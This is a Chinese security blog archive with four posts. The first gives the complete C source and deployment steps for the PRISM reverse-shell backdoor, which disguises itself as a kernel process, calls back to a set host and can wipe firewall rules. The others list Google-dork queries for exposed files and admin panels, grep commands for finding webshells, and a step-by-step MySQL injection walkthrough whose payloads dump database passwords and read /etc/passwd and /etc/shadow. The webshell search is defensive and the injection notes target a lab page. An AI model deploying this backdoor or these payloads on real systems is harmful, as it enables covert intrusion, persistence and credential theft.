-
nc反弹shell
2013-08-21 14:54:14
1、 在目标服务上传c文件test.c
2、 编译gcc -DDETACH -DSTATIC -Wall -s -o test test.c
3、 客户端启动nc
4、 执行命令 –lpv 443
C源码如下(
# define REVERSE_HOST "192.168.20.19" // 客户端ip
# define REVERSE_PORT 443 //客户端端口
#define PROCESS_NAME "[pdflush]" //启动的进程名
)
/*
* PRISM v0.5
* Reverse Shell Backdoor
*
* by Andrea Fabrizi
* http://www.andreafabrizi.it/?prism
*
* ICMP packet mode (Default):
* The backdoor waits silently for a specific ICMP packet containing
* the host/port (and a security key) to connect.
*
* STATIC mode
* The backdoor try co connect to the specified host/port (REVERSE_HOST/REVERSE_HOST)
* every n seconds (RESPAWN_DELAY).
*
* How to compile:
* gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c
*
* -DDETACH #Run process in background
* -DSTATIC #Enable STATIC mode
* -DNORENAME #Don't rename process
* -DIPTABLES #Try to flush all iptables rules
*
* payload.bin file example:
* p455w0rD 192.168.0.2 5055
*
* nc -l -p 5055
*
* nemesis icmp -i 8 -c 0 -D 192.168.0.1 -P payload.bin
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <netdb.h>
#include <unistd.h>
#include <ctype.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#ifdef STATIC
# define REVERSE_HOST "192.168.20.19"
# define REVERSE_PORT 443
# define RESPAWN_DELAY 15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY "p455w0rD"
#endif
#define VERSION "0.5"
#define MOTD "PRISM v"VERSION" started\n\n# "
#define SHELL "/bin/sh"
#define PROCESS_NAME "[pdflush]"
/*
* Start the reverse shell
*/
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
int sd;
struct sockaddr_in serv_addr;
struct hostent *server;
/* socket() */
sd = socket(AF_INET, SOCK_STREAM, 0);
if (sd < 0)
return;
server = gethostbyname(bd_ip);
if (server == NULL)
return;
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
serv_addr.sin_port = htons(bd_port);
/* connect() */
if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
return;
/* motd */
write(sd, MOTD, strlen(MOTD));
/* connect the socket to sdout,stdin and stderr of this process */
dup2(sd, 0);
dup2(sd, 1);
dup2(sd, 2);
/* running the shell */
execl(SHELL, SHELL, (char *)0);
close(sd);
}
/*
* Try to flush all iptables rules
* You can embed here any command you want to be executed from the backdoor :)
*/
#ifdef IPTABLES
void flush_iptables(void)
{
system("iptables -X 2> /dev/null");
system("iptables -F 2> /dev/null");
system("iptables -t nat -F 2> /dev/null");
system("iptables -t nat -X 2> /dev/null");
system("iptables -t mangle -F 2> /dev/null");
system("iptables -t mangle -X 2> /dev/null");
system("iptables -P INPUT ACCEPT 2> /dev/null");
system("iptables -P FORWARD ACCEPT 2> /dev/null");
system("iptables -P OUTPUT ACCEPT 2> /dev/null");
}
#endif
/*
* ICMP packet mode
*/
#ifndef STATIC
void icmp_listen(void)
{
int sockfd,
n,
icmp_key_size;
char buf[ICMP_PACKET_SIZE + 1];
struct icmp *icmp;
struct ip *ip;
icmp_key_size = strlen(ICMP_KEY);
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
/*
* Waiting for the activation ICMP packet
*/
while (1) {
/* get the icmp packet */
bzero(buf, ICMP_PACKET_SIZE + 1);
n = recv(sockfd, buf, ICMP_PACKET_SIZE,0);
if (n > 0) {
ip = (struct ip *)buf;
icmp = (struct icmp *)(ip + 1);
/* If this is an ICMP_ECHO packet and if the KEY is correct */
if ((icmp->icmp_type == ICMP_ECHO) && (memcmp(icmp->icmp_data,ICMP_KEY, icmp_key_size) == 0)) {
char bd_ip[16];
int bd_port;
bd_port = 0;
bzero(bd_ip, sizeof(bd_ip));
sscanf((char *)(icmp->icmp_data + icmp_key_size + 1), "%15s %d", bd_ip, &bd_port);
if ((bd_port <= 0) || (strlen(bd_ip) < 7))
continue;
/* Starting reverse shell */
if (fork() == 0) {
#ifdef IPTABLES
flush_iptables();
#endif
//printf("->Starting reverse shell (%s:%d)...\n", bd_ip, bd_port);
start_reverse_shell(bd_ip, bd_port);
exit(EXIT_SUCCESS);
}
}
}
}
}
#endif
/*
* main ()
*/
int main(int argc, char *argv[])
{
signal(SIGCLD, SIG_IGN); //Prevent child process from becoming zombie process
chdir("/");
/* If argv is equal to Inf0, some info will be printed
* In this way the "Inf0" string will not be seen in clear text into the binary file :)
*/
if ((argc == 2) && (argv[1][0] == 'I') && (argv[1][1] == 'n') && (argv[1][2] == 'f') && (argv[1][3] == '0')) {
fprintf(stdout, " Version:\t\t%s\n"
,VERSION);
#ifdef STATIC
fprintf(stdout, " Mode:\t\t\tstatic\n"
" Host:\t\t\t%s\n"
" Port:\t\t\t%d\n"
" Respawn Delay:\t\t%d sec\n"
,REVERSE_HOST, REVERSE_PORT, RESPAWN_DELAY);
#else
fprintf(stdout, " Mode:\t\t\ticmp\n"
" Key:\t\t\t%s\n"
,ICMP_KEY);
#endif
#ifndef NORENAME
fprintf(stdout, " Process name:\t\t%s\n", PROCESS_NAME);
#endif
fprintf(stdout, " Shell:\t\t\t%s\n", SHELL);
#ifdef DETACH
fprintf(stdout, " Detach:\t\tYes\n");
#else
fprintf(stdout, " Detach:\t\tNo\n");
#endif
#ifdef IPTABLES
fprintf(stdout, " Flush Iptables:\tYes\n");
#else
fprintf(stdout, " Flush Iptables:\tNo\n");
#endif
exit(EXIT_SUCCESS);
}
#ifndef NORENAME
int i;
/* Renaming the process */
strncpy(argv[0], PROCESS_NAME, strlen(argv[0]));
for (i=1; i<argc; i++)
memset(argv[i],' ', strlen(argv[i]));
#endif
#ifdef DETACH
if (fork() != 0)
exit(EXIT_SUCCESS);
#endif
#ifdef STATIC
while (1) {
#ifdef IPTABLES
flush_iptables();
#endif
/* Starting reverse shell */
if (fork() == 0) {
start_reverse_shell(REVERSE_HOST, REVERSE_PORT);
exit(EXIT_SUCCESS);
}
sleep(RESPAWN_DELAY);
}
#else
/* We need root privilegies to read ICMP packets! */
if (getgid() != 0) {
fprintf(stdout, "I'm not root :(\n");
exit(EXIT_FAILURE);
}
icmp_listen();
#endif
return EXIT_SUCCESS;
}
-
centos上webshell的查找方法
2013-06-14 08:51:25
webshell的一些关键字(eval,shell_exec,passthru,popen,system,cmd,szcmd,post,phpspy)查找方法如下:
find /var/webroot -name “*.php” |xargs grep “eval” |more
find /var/webroot -name “*.php” |xargs grep “shell_exec” |more
find /var/webroot -name “*.php” |xargs grep “passthru” |morefind /var/webroot -name “*.jsp” |xargs grep “popen” |more
find /home -name “*.php”|xargs grep “fsockopen”|more >test.log -
安全测试---- Google Hacking
2013-05-28 08:41:15
Google是一款功能强大的搜索引擎,能够根据robots协议抓取互联网上几乎所有页面,其中包括大量账号密码等敏感信息。google hacking其实就是利用google搜索的语法,做一些精准的搜索1、搜索错误的文件后缀搜索内容
说明
site: 域名 inurl:jsp.bak/php.bak
搜索站点中是否存在后缀为jsp.bak或php.bak的文件,即,某些jsp和php的备份文件。
site: 域名 filetype:sql
搜索站点中是否存在SQL脚本文件
site: 域名 inurl:log
搜索站点中是否存在应用程序日志文件,如ftp日志、oracle日志等
site: 域名 filetype:txt
查找站点中是否有包含敏感信息的txt文件
site: 域名 filetype:conf
查找站点中是否有包含敏感信息的conf文件
2、查找第三方组件或者程序搜索内容
说明
site: 域名 inurl:/fckeditor/
搜索站点是否使用了fckeditor
site: 域名 inurl:ewebeditor
搜索站点是否使用了 eWebEditor
3、搜索错误的配置搜索内容
说明
site: 域名 intitle:”index of /”
搜索站点是否使用了列目录功能
site: 域名 inurl:"examples"
搜索站点中是否存在测试代码
4、搜索管理后台搜索内容
说明
site: 域名 inurl:admin
site: 域名 inurl:login
site: 域名 inurl:manage
site: 域名 inurl:system
site: 域名 inurl:console
搜索站点是否对外开放了管理后台
google搜索语法说明:
语法 说明 + 搜索结果要求包含两个或者两个以上的关键字 - 逻辑非,减号后是要排除的关键字 “”() 可用来搜索完整的句子,可包括空格 OR(要大写)与| 搜索结果至少包含关键字中的任意一个 intitle与allintitle: 对网页标题栏的关键字查询 inurl与allinurl: 查找网址链接的关键字 site: 搜索结果局限于某个域名下 intext与allintext: 只搜索网页body部分中包含的文字 filetype与ext: 搜索某类文件 link: 搜索所有链接到某个url地址的网页 related: 用来搜索结构内容方面相似的网页 cache: 从google缓存中搜索 info: 显示与某链接相关的一系列搜索 -
手工注入mysql笔记
2012-11-30 10:47:34
让开发同事帮忙写了个页面,没有防止sql注入的。用来学习手工sql注入用到的一些函数和方法,其实就是个验证并记录的过程1、判断是否存在注入点http://192.168.0.226/inputTest/info.jsp?userid=1 and 1=1 正常执行,页面有结果http://192.168.0.226/inputTest/info.jsp?userid=1 and 1=2 页面没有结果http://192.168.0.226/inputTest/info.jsp?userid=1 and 页面异常,从异常信息可以看出是mysql数据库2、判断数据库类型http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,@@versionhttp://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,version()3、判断字段数量http://192.168.0.226/inputTest/info.jsp?userid=1 order by 9 页面异常,可以看出没有字段9,继续减小数字http://192.168.0.226/inputTest/info.jsp?userid=1 order by 2 页面正常输出,说明有2个字段http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,2 页面正常输出4、查询当前数据库名称http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,2,database() 页面异常,因为只有2个字段http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,database() 正常输出,最后的显示是数据库名 (test)http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,concat(database()) 正常输出,最后的显示是数据库名5、查服务器操作系统http://192.168.0.226/inputTest/info.jsp?userid=1 union select 1,@@version_compile_oshttp://192.168.0.226/inputTest/info.jsp?userid=1 union all select 1,@@global.version_compile_os from mysql.user6、查询数据库版本和用户查询版本可用version() 或者@@version查询用户可用user()或System_user()或Session_user()或Current_user()http://192.168.0.226/inputTest/info.jsp?userid=1 union all select user(),version()7、查询数据库路径http://192.168.0.226/inputTest/info.jsp?userid=1 union all select 1,@@basedir8、查用户和密码http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,group_concat(user,0x3a,password) from mysql.user0x3a:分割作用9、查询所有库名和表名http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0,group_concat(table_schema,0x3a,table_name) from information_schema.tables详细情况请查看information_schema库10、查看当前库的所有表名http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, group_concat(table_name) from information_schema.tables where table_schema='test'11、查看表的字段名http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, group_concat(column_name) from information_schema.columns where table_name='usertest'到此为止,数据库基本搞定,根据库,表,字段可以查询出管理后台或者用户的用户名和密码。12、读系统文件http://192.168.0.226/inputTest/info.jsp?userid=1 union select 0, load_file(0x2F6574632F706173737764)•0x633a5c626f6f742e696e69 c:\boot.ini
•0x2F6574632F706173737764 /etc/passwd
•0x2F6574632F736861646F77 /etc/shadow
标题搜索
我的存档
数据统计
- 访问量: 14662
- 日志数: 15
- 图片数: 1
- 文件数: 1
- 建立时间: 2007-04-24
- 更新时间: 2014-02-13
